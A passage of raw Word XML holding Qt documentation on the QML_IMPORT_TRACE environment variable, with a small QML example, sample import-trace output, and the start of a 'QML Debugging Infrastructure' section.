        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>environment variable can be set to enable debug output from QML's import loading mechanisms</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162275" w:rsidRPr="00162275" w:rsidRDefault="00162275" w:rsidP="00162275">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">For </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, for a simple QML file like this:</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QtQuick</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2.3</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p>
    <w:p w:rsidR="00162275" w:rsidRPr="00162275" w:rsidRDefault="00162275" w:rsidP="00162275">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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width</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w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>100</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height</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w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>100</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>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162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>If you set</w:t>
      </w:r>
      <w:r w:rsidR="003613F0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML_IMPORT_TRACE=1</w:t>
      </w:r>
      <w:r w:rsidR="003613F0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>before running the</w:t>
      </w:r>
      <w:r w:rsidR="003613F0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId3015" w:history="1">
        <w:r w:rsidRPr="00162275">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QML Scene</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="003613F0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(or your QML C++ application), you will see output similar to this:</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QQmlImportDatabase</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addImportPath </w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"/qt-sdk/imports"</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QQmlImportDatabase</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addImportPath </w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"/qt-sdk/bin/QMLViewer.app/Contents/MacOS"</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QQmlImportDatabase</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addToImport </w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x106237370</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>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w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>File</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>as</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>""</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162275" w:rsidRPr="00162275" w:rsidRDefault="00162275" w:rsidP="00162275">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QQmlImportDatabase</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addToImport </w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x106237370</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Qt"</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4.7</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Library</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>as</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>""</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162275" w:rsidRPr="00162275" w:rsidRDefault="00162275" w:rsidP="00162275">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QQmlImportDatabase</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resolveType </w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Rectangle"</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"QDeclarativeRectangle"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162275" w:rsidRPr="00162275" w:rsidRDefault="00162275" w:rsidP="003613F0">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2745" w:name="qml-debugging-infrastructure"/>
      <w:bookmarkStart w:id="2746" w:name="_Toc483604466"/>
      <w:bookmarkStart w:id="2747" w:name="_Toc483605686"/>
      <w:bookmarkEnd w:id="2745"/>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML Debugging Infrastructure</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2746"/>
      <w:bookmarkEnd w:id="2747"/>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162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidR="003613F0">
        <w:rPr>
